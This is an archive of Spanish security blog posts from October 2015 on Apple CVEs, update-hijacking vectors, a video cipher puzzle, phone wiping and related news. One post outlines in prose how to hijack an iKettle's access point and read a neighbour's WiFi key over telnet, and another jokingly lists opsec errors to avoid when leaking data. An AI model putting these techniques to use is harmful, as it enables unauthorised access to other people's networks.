Este blog ya no está activo, sigue informándote aquí:

sábado, 31 de octubre de 2015

PT1BIEhhbGxvd2VlbiBKb2tlPT0=

01100101 01100101 01100101 01100101 01100101 01100101 01100101 01100101 01100101 01100101 01100101 00111101 00100000 01000010 01001111 01001111 01001111 01001111 01001111 01001111 00100000 00111101 00100000 01100101 01100101 01100101 01100101 01100101 01100101 01100101 01100101 01100101 01100101
       ,-------------.
      /               \
     /   __       __   \
    |  /,--.     ,--.\  |
    |   \  |  __ |  /   |
    |    `-' /  \`-/    |
     \__    |_/\_|   __/
       /_           _\
       | |,-.,-.,-.| |
       `-'| || || |`-'
       ,-.`-'`-'`-',-.
       \_|_,-.,-.,-|_/
       | |_|_||_||_|
        `--.____.--'

30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65 3d 3d 3e 6c 78 78 74 3a 2f 2f 6d 32 2e 61 74 2e 67 73 71 2f 61 61 61 2e 6b 76 69 69 72 7a 6d 70 70 69 61 69 66 2e 79 77 2f 61 74 2d 67 73 72 78 69 72 78 2f 79 74 70 73 65 68 77 2f 3c 3d 3d 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 65 65 65 65 65 65 65 65 65 65 65 65 65 65 65


U2VkIEJ1ZW5vcyB5IEhhcHB5IEhhbGxvd2VlbiA7KSA=

viernes, 30 de octubre de 2015

(Paper) Captura de Figuras Humanas Through The Wall

Hace unos días que vi la noticia de que el MIT ya era capaz de localizar a gente detrás de muros a través de señales de radio frecuencia. Pero aún no había sido capaz de encontrar el paper de los investigadores del Massachusetts Institute of Technology. Pero por fin esta en mi poder.


Esto funciona gracias a que se es capaz de capturar y transmitir señales inalámbricas RF que, al chocar contra una persona de pie detrás de una pared, se reflejan en diversas partes del cuerpo y luego son devueltas al dispositivo para reconstruir toda la imagen de la persona.
  • El dispositivo RF-Capture transmite ondas de radio que pasan a través de los objetos físicos
  • Las señales de radio se reflejan en lo que está en el otro lado y se recuperan al dispositivo RF-Capture
  • El RF-Capture mide la intensidad de las ondas, entre otras variables
  • El dispositivo se utiliza un algoritmo para crear una silueta precisa
Fuente de la noticia: 
Enlace al paper:
A mi me ha encantado y espero que a vosotros también.

Sed Buenos ;)

jueves, 29 de octubre de 2015

Eliminando Información de Nuestros Smartphones de Forma Segura

Muchas veces me he parado a pensar que este tipo de entradas se podrían resumir en una frase y un vídeo como por ejemplo:

Hazlo pedazos 



Pero pongamos el caso de que no queremos destruir el dispositivo sino que lo queremos guardar para por si acaso el nuevo se nos estropeara. Así que vamos a ver algunos puntos que deberíamos hacer en caso de que queramos deshacernos de nuestra información.
  1. Quita la tarjeta SIM y la SD, si no las vas a volver a utilizar. Da de baja el numero y al Microondas xD o a una trituradora ya que hoy información persona que puede almacenarse en su interior. Si la vas a utilizar de nuevo cámbialo de dispositivo libremente pero nunca lo dejes junto al Smatphone. 
  2. Devuelve el Smarthphone a su estado de fabrica eliminando así toda la información que le pudiera ser útil al atacante. 
  3. Cifra el contenido de la memoria por si una tercera persona quisiera acceder a dicha información o realizar un análisis forense. 
Fuente: 
Pero si no lo vais a volver a utilizar lo mejor es relajaros con el i hacerlo pedazos eso si sacadle la batería antes de hacerlo para que no pase ningún accidente. 

Si creéis que me he dejado algo importante por favor dejádmelo en los comentarios o contactarme donde sea. 

Sed Buenos ;) 

miércoles, 28 de octubre de 2015

Forensic Posters .- Cariño Hoy Toca Empapelar El Piso.

La verdad es que aunque muchas veces os hable de temas relacionados con la seguridad informática tengo un especial cariño por la informática forense y creo que de todas maneras no puede ser malos saber de las dos disciplinas. Así que si hoy os contara que he encontrado un postes para imprimir que resumen el funcionamiento de varios protocolos, volúmenes y atributos a nivel forense, estaréis conmigo cuando os digo que quiero imprimirlos todos y ponerlos por donde pueda. 


Aquí os dejo el Git Hub donde Jared Atkinson y Ange Albertini han publicado estos posters tan chulos. 
Si me animo puede que haga una serie destinada a explicar cada uno de estos posters ya que hay algunos que no entiendo del todo y así estudio un poco. 

Sed Buenos ;) 


martes, 27 de octubre de 2015

¿CSIRT? ¿Estás Seguro?

La verdad es que desde que entré a trabajar no pensaba que tendría de descifrar una gran cantidad de de siglas y palabrería técnica. La última fue CSIRT y aprovechando que la buena gente de ElvenPath van a redactar una serie de entradas referente a esto, os los recomiendo y yo aprendo un poco mas sobre Equipos de Respuesta ante Incidencias de Seguridad. 


CSIRT son las siglas de Computer Security Incident Response Team (Equipos de Respuesta ante Incidencias de Seguridad)  y consta de un equipo que da una respuesta rápida para contener la posible incidencia en la seguridad informática, aunque también pueden ayudar en la fase de recuperación una vez solucionada esta incidencia. Hasta donde llegue el CSIRT dependerá de los servicios que se le hayan contratado. 

Puntos que ElevenPath cree que un CSIRT puede beneficiar a nuestra organización y la verdad es que creo que tienen mucha razón:
  • Intercambia experiencias en solución de incidentes para el crecimiento en seguridad de las organizaciones y/o comunidades atendidas.
  • Cuenta con un equipo altamente capacitado en temas de seguridad cibernética el cual se encuentra en constante proceso de actualización con el objetivo de prestar a la comunidad atendida, servicios de seguridad con un alto grado de calidad.
  • Genera y publica diverso material de formación y concienciación en aspectos de seguridad cibernética.
  • Brinda apoyo a otras organizaciones y comunidades que lo requieran con el objeto de que estasdesarrollen capacidades propias para el manejo de incidentes de seguridad cibernética.
  • Sirve de apoyo y colaboración a cuerpos de investigación y seguridad nacionales con el objeto de combatir el ciberdelito.
Fuente: 

lunes, 26 de octubre de 2015

Call For Papers - RootedCON 2016

Hoy el congreso RootedCON abre las puestas a todo aquel que quiera enviar sus propuestas de ponencias para la edición del 2016. Así que ya sabéis si tenéis algún tema que os gustaría exponer y estáis cerca de Madrid os recomiendo enviar vuestras propuestas a este congreso. 

Comienza el proceso de solicitud de ponencias (Call For Papers) para Rooted CON 2016. Al igual que en anteriores ediciones, es posible registrar una o varias ponencias a travées del formulario.
Este año como principal novedad, cambiamos de localización, y el congreso se celebra enSala 25 de los cines KINEPOLIS de Ciudad de La Imagen en Madrid.

 Aquí tenéis el formulario:

Sed Buenos ;) 

domingo, 25 de octubre de 2015

¿Ya Actualizas De Forma Segura?

Muchas veces y en muchos blogs os indicamos que actualicéis deprisa y corriendo vuestros sistemas, pero creo que en este blog nunca hemos hablado de los peligros que puede haber al actualizar el sistema si no lo hacemos de una forma segura. Así que, hoy haremos un repaso por las formas que se puede vulnerar una actualización.
 
  1. Si la comunicación entre procesos del sistema (IPC) podría alterarse. 
  2. Cuando las rutas de archivos relativas en archivos de configuración presentan algún fallo sera posible suplantar el ejecutable y hacer que el sistema ejecute lo que nosotros queramos.
  3. Firmas digitales: Si la creación de certificados no es óptima o existe un abuso de certificados legítimos podríamos utilizarlos para suplantar el certificado y actualizar con  lo que nosotros queramos.
  4. Explotación de comunicaciones inseguras: ataques Man-In-The-Middle, o engañar al sistema realizando ataques DNS.
  5. Además, si no tenemos cuidado al desempaquetar archivos comprimidos y modificarlos, podrían aprovechar el momento en que se verifica la firma y el momento en que se desempaqueta para colar lo que sea.
De esta manera tendríamos que tener mucho cuidado de como realizamos las actualizaciones correspondientes  aunque comprobar el buen funcionamiento de estas es una labor uno poco tocha pero debería hacerse.

Si queréis mucha mas información os recomiendo encarecidamente leer la fuente de esta entrada:
Sed Buenos ;) 

viernes, 23 de octubre de 2015

The Creepy Puzzle - Tell Me Why

Hace un par de días que llegó a mi muro de Facebook varias páginas que hacían alusión a un vídeo muy misterioso en el cual aparece una persona enmascarada con ese tipo de cubre-caras que utilizaban los médicos de la peste negra y el cual me he visto hoy antes de hacer esta entrada. La verdad es que el vídeo en si no da miedo, si dejamos de lado el sonido estridente que a medio vídeo he bloqueado para que no me fundiera los tímpanos. No da miedo pero si que consigue dar angustia, me ha pasado algo parecido a cuando vi "La Bruja De Blair" me he pasado todo el vídeo pensando que pasaría algo y lo único que hace el buen hombre es sacar su mano de IronMan y mirar de un lado para otro intentando dar unos cuantos mensajes junto a imágenes solapadas y números escondidos. 


Lo que si que mas miedo es lo que se encuentra analizando el vídeo y esto ha hecho que no haya podido centrarme al leer según que cosas si tener de fondo [Backstreet Boys - I Want It That Way] ya que cuando la escucho me imagino al hombre de la mascara en el videoclip y cambio el miedo por una sonrisa (Tengo que hacer el montaje xD). Para ponernos en contexto y ya que la historia podéis encontrar la en muchos iré mas concretamente a las partes que sean necesarias para explicar los puzzles. 

Un buen día llegó un DVD al blog gadgetzz que portaba el siguiente titulo: 
  • YWEldTAxMDJVJXU (aquí salta a una lienas mas abajo por que no le cambia xD) wVWFjZ2E= 
El último igual, es muy característico de Base64 así que al descifrarlo podemos encontrar aa%u0102U%u0Uacga pasado a la codificación unicode encontrarnos 11B-X-1371 siendo la X un misterio ya que la persona que lo descodifico al unicode no tenia claro dicho caracter. Aunque se discute que puede ser un 4 pero se está discutiendo. 
En el DVD se encontraron dos archivos de vídeo (que yo hubiera analizado con la FOCA o Grampus en menos que cante un gallo pero de eso no hay ni rastro) y un usuario a analizado el espectrograma de ambos:
  • En el espectrograma del primero, llamado VIDEO_TS.VOB, contiene la imagen de una calavera con dos textos cifrados. Aún no se ha podido sacar nada en claro del resultada de descifrar los dos textos. 
  • Por otro lado y esta es la parte mas creepy, está el vídeo llamado VTS_01_1.VOB que contiene varias imágenes de peliculas y escenas de crímenes. 
En el sonido del vídeo (Si, ese que yo saqué por que era horrible) modulando la voz se puede escuchar  "5 'oclock" y "we are the antivirus"

Bueno, puestos un poco en el tema mejor os hago una lista de lo que se ha descubierto y lo que no hasta la fecha:

Descubierto:
  • Modulando la señal anterior se puede leer "We are the antivirus"
  • Varios caracteres apareces en pequeños trozos del video:
    • Algunos usuarios han podido recopilar estos caracteres donde se puede leer:
      • "Strike an arrow through the heart of the eagle"
  • La secuencia de luces del minuto  03.84 corresponde a una secuencia en Morse donde se puede leer REDLIPSLIFETENTH un anagrama de KILLTHEPRESIDENT
  • En el 28.240 se ven los siguientes 20 pares de digitos:
    • 33 38 2e 38 39 37 37 30 39 2c 2d 37 37 2e 30 33 36 35 34 33 (Hexadecimal)
      • 38.897709, -77.036543 --> Vamos, la Casa Blanca
  • La secuencia de luces del 32.920 vuelve a ser Morse y se puede leer:
    • "2015THEREWILLBE(THREE)" (¿Una profecía?)
  • Una secuencia de caracteres en el 1:26.520:
    • 41 20 6e 65 77 20 6f 72 64 65 72 20 69 73 20 6f 6e 20 74 68 65 20 72 69 73 65 2e 20 59 6f 75 20 77 69 6c 6c 20 6a 6f 69 6e 2c 20 6f 72 20 79 6f 75 20 77 69 6c 6c 20 66 61 6c 6c 2e 20 54 68 65 20 76 69 72 75 73 20 68 61 73 20 73 70 72 65 61 64 20 74 6f 6f 20 66 61 72 3b 20 69 74 20 6d 75 73 74 20 62 65 20 73 74 6f 70 70 65 64 2e 20 57 65 20 77 69 6c 6c 20 64 69 6b 65 20 69 74 20 61 74 20 69 74 27 73 20 72 6f 6f 74 2e 20 31 33 20 61 6e 69 20 35 30 2c 20 77 69 6c 6c 20 62 75 72 6e 2e (Hecadecimal too xD no tiene mas misterio)
      • Se traduce a "A new order is on the rise. You will join, or you will fall. The virus has spread too far; it must be stopped. We will dike it at it's root. 13 and 50, will burn."
  • El dibujo raro que se ve en el 01:23.880 cuando mueve la cabeza a un lado.corresponde al cifrado Pigpen un [tipo de cifrado geométrico] también llamado el cifrado tic-tac-toe y se pude encontrar la siguiente frese en Latin:
    • "AD OPPUGNARE HOMINES" lo que se traduce en TO TARGET/ATTACK MEN"
  • En el 01:37 hay la siguiente notación algebraica (vamos lo que se usa en el ajedrez para identificar en que posición esta cada pieza o como en el juego de hundir la flota pera disparar) 
    • "E2-E3 D1-F3 F1-C4 F3xF7" que representa un Jaque Mate en 4 movimientos. 
  • Otro texto cifrado de una manera que desconozco aparece en 01:51.600se traduciría de la siguiente manera:
    • SOON COMES THE FALL / ANOTHER GREAT EMPIRE.
    •  THE FALL / THE EAGLE ON THE HORIZON.
    •  JOIN US. THE EAGLE = INFECTED WILL SPREADD HIS DISEEASE.
    •  WE AARE TTHE ANTIVIRUS WILL PROTECT THE WORLD BODY."

Lo que falta por conocer:
  • Los siguiente dígitos con el carácter anexo: 
    • 00:09.720: 24 X (gesturing 3)
    • 00:10.320: 07-G (gesturing 1)
    • 00:11.840: 06-F (gesturing 2)
    • 01:16.440: 23-W
      • Un usario ha sugerio que puede referirse a Abwehr Enigma G-312.
  • Una secuencia de 4 pares de caracteres que descifrados tendrían este mensaje: 
    • "AHCJ WVFE YCHW CSMV XUGQ OYXG XABE EMMG HDVS CIMP JRBX HWLH ?CUS LFCS LXIP NMPC ?QJI XZIG FXRO QEXT ?MSV SBOG UURD ?OCL"
Bueno, la verdad es que al principio de este blog me daba algo de miedo pero contra mas me he alejado del vídeo principal y las imágenes y me he puesto en pensar e anagramas y cifrados hasta me ha parecido como si estuviera en una CTF solo que mucho mas macabra. 

Si quereis mucha mas información y/o quereis colaborar con los hallazgos os dejo el siguiente enlace:
Sed Buenos e investigad mucho ;)

jueves, 22 de octubre de 2015

Actualizaciones de Seguridad Para iOS, Safari, MacOSX (¡ACTUALIZA!)

Hace mas o meno medio mes fui al barbero de toda la vida, el sabe de lo que trabajo y como le gusta la tecnología a veces me preguntas por cosas curiosas o por pequeñas dudas que tenga el.  Bueno, el otro día me pregunto el porqué no se utilizaban Macs para trabajar en las empresas si estaba demostrado que eran mucho mas seguros y resistentes. 


Ya podéis adivinar cual fue mi respuesta pero, aprovechando que ayer Apple lanzo unos cuantos boletines de seguridad, hoy quiero centrarme en todas las vulnerabilidades de iOS, Safari, MacOSX que se han notificado este mes para que si hay alguien que piense que los productos Apple no tienen fallos de seguridad esta muy equivocado. 

iOS:
  • CVE-2015-5940: Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario. 
  • CVE-2015-7006: Un fallo al desempaquetar un archive malicioso permite ejecutar código arbitrario.
  • CVE-2015-7023 : Vulnerabilidad que permite a una página maliciosa permite que las cookies sean sobrescritas.
  • CVE-2015-7015 : Vulnerabilidad que permite a una aplicación maliciosa elevar sus privilegios.
  • CVE-2015-5925 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-5926 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-6975 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6992 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-7017 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario..
  • CVE-2015-6995 : Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema. 
  • CVE-2015-5927 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-5942: Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6976 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6977 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6978 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6990 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6991 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6993 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-7008 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-7009 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-7010 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-7018 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6979 : Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema
  • CVE-2015-6989 : Un fallo al procesar un paquete específicamente creado permite ejecutar código de manera arbitraria. 
  • CVE-2015-6986 : Un fallo al ejecutar una aplicación maliciosa permite ejecutar código arbitrario dentro del Kernel de Linux.
  • CVE-2015-5935 : Un fallo al ver una imagen maliciosa permite ejecutar código arbitrario. 
  • CVE-2015-5936 : Un fallo al ver una imagen maliciosa permite ejecutar código arbitrario. 
  • CVE-2015-5937 : Un fallo al ver una imagen maliciosa permite ejecutar código arbitrario.
  • CVE-2015-5939 : Un fallo al ver una imagen maliciosa permite ejecutar código arbitrario.
  • CVE-2015-6996 : Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema
  • CVE-2015-6974: Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema
  • CVE-2015-7004 : Vulnerabilidad que permite causar una denegación de servicio en local
  • CVE-2015-6988 : Un fallo permite a un atacante con una posición privilegiada en la red ejecutar código arbitrario. 
  • CVE-2015-6994 : Vulnerabilidad que permite causar una denegación de servicio en local.
  • CVE-2015-7000 : Vulnerabilidad que permite que aparezcan notificaciones de llamadas y mensajes en la pantalla de bloqueo. 
  • CVE-2015-5924 : Visiting a maliciously crafted website may lead to arbitrary code execution
  • CVE-2015-6983 : Un fallo al procesar un archive de fuente malicioso permite sobrescribir archivos.
  • CVE-2015-6999 : Un fallo permite al atacante que un certificado revocado aparezca como válido. 
  • CVE-2015-7022 :Vulnerabilidad que permite a una aplicación maliciosa filtrar información del usuario. 
  • CVE-2015-5928 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-5929 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-5930 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-6981: Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-6982: Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-7002 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-7005 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario. 
  • CVE-2015-7012 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-7014: Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.

Productos afectados:
  • iPhone 4s and later, iPod touch (5th generation) y anteriores, iPad 2 y anteriores. 
Más información:
Solución:

  • Esta actualización ya está disponible desde el Software Update o el Apple Downloads site.

Safari:
  • CVE-2015-5928 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-5929 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-5930 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-5931: Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-7002 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-7011 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-7012 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-7013 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-7014: Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 

Productos afectados:

  • OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, y OS X El Capitan v10.11 

Más información:

Solución:
  • Apple ha publicado la versión 9.0.1 de Safari y ya está disponible desde la Mac App Store.

MacOSX:
  • CVE-2015-5940 : Un fallo al visitar una página web maliciosa permite la ejecución de código arbitrario. 
  • CVE-2015-0235: Múltiples vulnerabilidades en PHP 
  • CVE-2015-0273: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6834: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6835: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6836: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6837: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6838: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6985 : Un fallo al visitar una página web maliciosa permite el inesperado cierre de una aplicación o la ejecución arbitraria de código. 
  • CVE-2015-7003 : Un fallo en coreaudiod permite la no inicialización de la memoria. 
  • CVE-2015-5933 : Un fallo en la ejecución de un archivo de audio permite la ejecución remota de código. 
  • CVE-2015-5934 : Un fallo en la ejecución de un archivo de audio permite la ejecución remota de código. 
  • CVE-2015-7006 : Un fallo en el desempaquetado de un archive malicioso permite la ejecución arbitraria de código. 
  • CVE-2015-7023 : Un fallo al visitar una página web especialmente creada permite sobrescribir las cookies. 
  • CVE-2015-7015 : Vulnerabilidad que permite a una aplicación maliciosa elevar sus privilegios. 
  • CVE-2015-5925 : Un fallo al visitar una página web maliciosa permite la ejecución de código arbitrario. 
  • CVE-2015-5926 : Un fallo al visitar una página web maliciosa permite la ejecución de código arbitrario. 
  • CVE-2015-6992 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6975 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-7017 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-5944 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6995 : Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema 
  • CVE-2015-7035 : Vulnerabilidad que permite a aun atacante ejecutar funciones EFI 
  • CVE-2015-6987 : Un fallo en navegar con marcadores especialmente creados permite el cierre inesperado de la aplicación. 
  • CVE-2015-5927 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-5942: Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6976 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6977 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6978 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6991 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6993 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-7009 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-7010 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-7018 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6990 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario 
  • CVE-2015-7008 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario 
  • CVE-2015-6989 : Un fallo en el proceso de paquetes especialmente creados permite la ejecución de código arbitrario. 
  • CVE-2015-7019 : Vulnerabilidad que permite a un usuario local causar el cierre inesperado del Sistema o leer la memoria del kernel. 
  • CVE-2015-7020 : Vulnerabilidad que permite a un usuario local causar el cierre inesperado del Sistema o leer la memoria del kernel. 
  • CVE-2015-7021 : Vulnerabilidad que permite a un usuario local ejecutar código arbitrario con privilegios del kernel. 
  • CVE-2015-5935 : Un fallo en el proceso de un archive de imagen permite la ejecución de código arbitrario. 
  • CVE-2015-5938 : Un fallo en el proceso de un archive de imagen permite la ejecución de código arbitrario. 
  • CVE-2015-5936 : Un fallo en el proceso de un archive de imagen permite la ejecución de código arbitrario. 
  • CVE-2015-5937 : Un fallo en el proceso de un archive de imagen permite la ejecución de código arbitrario. 
  • CVE-2015-5939 : Un fallo en el proceso de un archive de imagen permite la ejecución de código arbitrario. 
  • CVE-2015-6996 : Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema. 
  • CVE-2015-6974 : Vulnerabilidad que permite a un usuario local ejecutar código arbitrario. 
  • CVE-2015-5932 : Vulnerabilidad que permite a un usuario local causar el cierre inesperado del Sistema o leer la memoria del kernel. 
  • CVE-2015-6988 : Vulnerabilidad que permite a un atacante con una posición privilegiada en la red ejecutar código arbitrario 
  • CVE-2015-6994 : Vulnerabilidad que permite a un usuario local causar una denegación de servicio. 
  • CVE-2015-6984 : Vulnerabilidad que permite a una aplicación maliciosa sobrescribir archivos de forma arbitraria. 
  • CVE-2012-6151: Vulnerabilidad que permite a un atacante con una posición privilegiada en la red ejecutar una denegación de servicio. 
  • CVE-2014-3565: Vulnerabilidad que permite a un atacante con una posición privilegiada en la red ejecutar una denegación de servicio. 
  • CVE-2015-5924 : Un fallo al visitar una página web maliciosa permite la ejecución de código arbitrario. 
  • CVE-2015-6563 : Vulnerabilidad que permite a un usuario local provocar ataques no definidos. 
  • CVE-2015-5945 : Vulnerabilidad que permite a un usuario local ejecutar código arbitrario con privilegios del kernel. 
  • CVE-2015-7007 : Vulnerabilidad permite correr AppleScripts de forma arbitraria. 
  • CVE-2015-6983 : Vulnerabilidad que permite a una aplicación maliciosa sobrescribir archivos de forma arbitraria 
  • CVE-2015-5943: Vulnerabilidad que permite a una aplicación maliciosa controlar los keychain access prompts 

Productos afectados:
  • OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, y OS X El Capitan 10.11 

Más información:

Solución:

Bueno, también supongo que a alguien le servirá esta información pero que nadie me diga que los productos Apple son robustos y no tienen fallos de seguridad.

Sed Buenos ;) 

miércoles, 21 de octubre de 2015

Wifi, Vecino y Un Tetera.

Nunca se me ocurrió que una tetera con wifi podría ser el mejor regalo que hacerles a mis vecinos para cuando yo no tenga Internet. Bueno ya hablamos ayer de vulnerabilidades dentro de un hogar inteligente ¿no? pues esta es una buena forma de aprender como no se ha de crear este tipo de tecnología. 

iKettle "La primera tetera/calentador de agua" con wifi es capaz de conectarse a la wifi de nuestra casa y puede ser programada y manipulada desde una app para Android y iOS. Ademas, son vulnerables a un AP Hijacking. 

Esto quiere decir que si hacemos que el Acces Point (El wifi del vecino) caiga y levantamos uno nosotros con el mimo nombre (SSID) la tetera/calentador de agua se conectará a nuestra red.


De esta manera, escaneando nuestra red y viendo la tetera, podremos conectarnos por telnet a ella podremos ver como la clave cifrada del AP del vecino esta guardada en texto plano. 


Mas información:

Sed Buenos con esto 0;) 

martes, 20 de octubre de 2015

Healthcare & Threats

Ayer en [Segu.Info] me asombré de un articulo que rezaba de la siguiente manera "Aumentan un 600% los ataques a la industria de la salud" y la verdad es que este titular viene respaldado por el anuncios de los [resultados de la empresa Raytheon|Websense] sobre las amenazan que afectan al sector de la medicina moderna. 


La verdad es que no me sorprende ya que desde hace muchos meses ya salió una vulnerabilidad muy sonada un en dispensador automático de dosis el cual no tenia ningún tipo de seguridad y desde entonces no he parado de ver un ferviente empuje de las compañías proveedoras de estos equipos por solucionarlas e incluso notificarlas usando CVE. 
Así que la verdad es que no creo que los ataques a la industria hayan aumentedo un 600% sino, que ahora somos capaces de detectarlos y por eso ahora se han detectado tantos ataques ya que hace medio año no habían maneras de poder localizar estas vulnerabilidades y muy posiblemente dentro de un par de años estemos hablando de que un hospital necesitará un sistema de gestión de vulnerabilidades para poder gestionarlas adecuadamente y administrar los parches de seguridad cuando toque y al equipo que toque priorizando el riesgo de dicho Asset/equipo.

Así que, y os lanzo esta idea. ¿A que estaría bien montar una lista de correo/página/etc que englobara todas las notificaciones de seguridad de todos los fabricantes de este tipo de productos? Pues si alguien se anima o sabe de alguna página que ya lo haga que me avise please. 

Bueno, esta opinión también es extrapolable a los nuevas vulnerabilidades que se han encontrado en los sistemas de lo coches y las que vendrán ahora que entramos en la moda de los hogares digitales. 

Esto es solo mi opinión y si tenéis otra sois libres de comentarla. 

Sed Buenos ;) 

lunes, 19 de octubre de 2015

ISIS & The "Hacker"

Hoy, dando un vuelta por diferentes blogs y páginas de seguridad e intentando evadirme del dolor de cabeza que me persigue desde aqyer a la noche, me he econtrado con una noticia en the Hacker News  donde se informaba del arresto de un "hacker" en Malasia acusado de flitrar a ISIS información de empleados y militares de Estados Unidos.


Lo que me ha llamado la atención de este articulo ha sido que el arrestado era el líder de un equipo de "hackers" llamado Kosoka "Hackers" security (KHS) y que habian conseguido filtrar bastante información de empresas de Estados Unidos y sobretodo me ha impresionado la manera que en que lo han pillado. 

Supongo que como "lider" de un grupo de "hackers" debe tener unos conceptos mínimos de anonimato y de privacidad, ya que si no los hubieran tenido seguramente hubieran pillado a todos los miembros del grupo. Pues al "lider" se le ha ocurrido que la mejor forma de comunicarse con el ISIS era siguiendo estos pasos: 
  1. Usar su nombre real en la cuenta de twitter.
  2. Usar mensajes directos sin cifrar para comunicarse con miembros de ISIS. 
  3. Nunca trató de esconder su IP real. 
Ahora está encarcelado en Malasia por 35 años y lejos de querer ser un poco conspi-paranoico diré que normalmente los cuerpos de seguridad no solo centran su investigación en el campo de internet si no a nivel económico, social y ya sabemos que hacen ciertas empresas con nuestra información. Así que no sorprende mucho que twitter se lo haya dejado en bandeja.

Pero, ¿Por qué utilizarria su cuenta personal? ¿Pensaba que no lo podían relacionar? ¿Por qué se comunicaba por Mensajes directos de twitter? ¿El ISIS no tiene otras maneras? ¿Por qué no cambiar tu ip si estabas filtrando información? Estas si son preguntas curiosas y que a mi se me escapan. 

Fuente: 
Bueno ahora ya sabéis lo que no tenéis que hacer si os decidís a filtrar información de cualquier entidad. 

